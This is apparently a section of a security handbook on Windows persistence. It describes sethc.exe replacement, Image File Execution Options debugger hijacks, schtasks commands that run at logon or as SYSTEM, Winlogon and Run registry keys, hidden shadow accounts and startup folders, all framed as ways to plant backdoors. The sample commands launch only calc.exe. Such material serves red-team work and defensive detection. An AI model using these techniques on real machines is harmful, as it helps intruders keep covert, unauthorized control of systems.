6.1.2. Persistence¶
6.1.2.2. Backdoor¶
6.1.2.2.1. sethc¶
sethc.exe is a sticky key handler called by the Windows system after the user presses shift five times. When there is a write file but no execution permission, a backdoor can be left by replacing sethc.exe and the entering shift five times on the password input page.
6.1.2.2.2. Image Hijacking¶
In later versions of Windows, the replacement program is protected by the system, and other tricks are required to achieve the replacement.
In the Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option add the option sethc.exe ,then in the options sethc.exe add the key``debugger``,value is the malicious program。
6.1.2.2.3. Scheduled task¶
There are two mechanisms schtasks and at for scheduled tasks in Windows,whichat at has been deprecated in later versions of Windows.
Set command: schtasks /create /tn "TEST_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" 、 schtasks /create /tn "TEST_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" ,delete command: schtasks /delete /tn "TEST_OnLogon" /f 。
6.1.2.2.4. Login Script¶
Windows can execute scripts before the user logs in, using the setting HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit。
It can also be set the UserInitMprLogonScript option under the path HKCU\Environment\ to archieve。
6.1.2.2.5. Screen saver¶
Windows can customize the screen saver using HKEY_CURRENT_USER\Control Panel\Desktop Settings 。
6.1.2.2.6. Hide users¶
Windows can create a username endwith $,this accounts can be hidden under certain conditions, but can still be viewed through the Control Panel。
On the basis of creating hidden users, shadow users can be created by modifying the registry. Users created in this way can only be viewed through the registry.
6.1.2.2.7. CLR¶
CLR (Common Language Runtime Compilation) is a runtime environment built by Microsoft for .NET products, which can be roughly understood as a .NET virtual machine.
The operation of .NET programs is inseparable from the CLR, so backdoors can be implemented by hijacking the CLR.
6.1.2.2.8. Winlogon Helper DLL backdoor¶
Winlogon is a Windows component that handles various activities such as login, logout, loading user profile during authentication, closing, locking the screen, etc. This behavior is governed by the registry, which defines which processes are started during Windows logon. So you can rely on this registry to maintain permissions.
The registry location is as follows:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellUsed to execute exe programHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserinitUsed to execute exe programHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\NotifyUsed to execute dll program
6.1.2.3. Self-start¶
6.1.2.3.1. Registry-based self-start¶
By writing the corresponding key value in the registry, the program can be automatically started at boot, mainly Run and RunOnce ,where the difference between RunOnce and Run is that the key value of RunOnce only works once, and it will be automatically deleted after execution.
The registry is as follows:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
The policy-based self-starting registry settings are as follows:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Set the startup folder registry location as follows:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Set the service startup item registry location as follows:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
User self-start location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit 、 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ,where Userinit key allows specifying multiple programs separated by commas.
If the user starts the screen saver, the screen saver can also be used to start the back. The relevant registry key value is:
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActiveHKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecureHKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOutHKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
6.1.2.3.2. Automatic startup based on a specific directory¶
Autostart folder, C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup takes effect for a specific user, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp takes effect for all users。Before NT6, the two directories were C:\Documents and Settings\Username\Start Menu\Programs\StartUp / C:\Documents and Settings\All Users\Start Menu\Programs\StartUp 。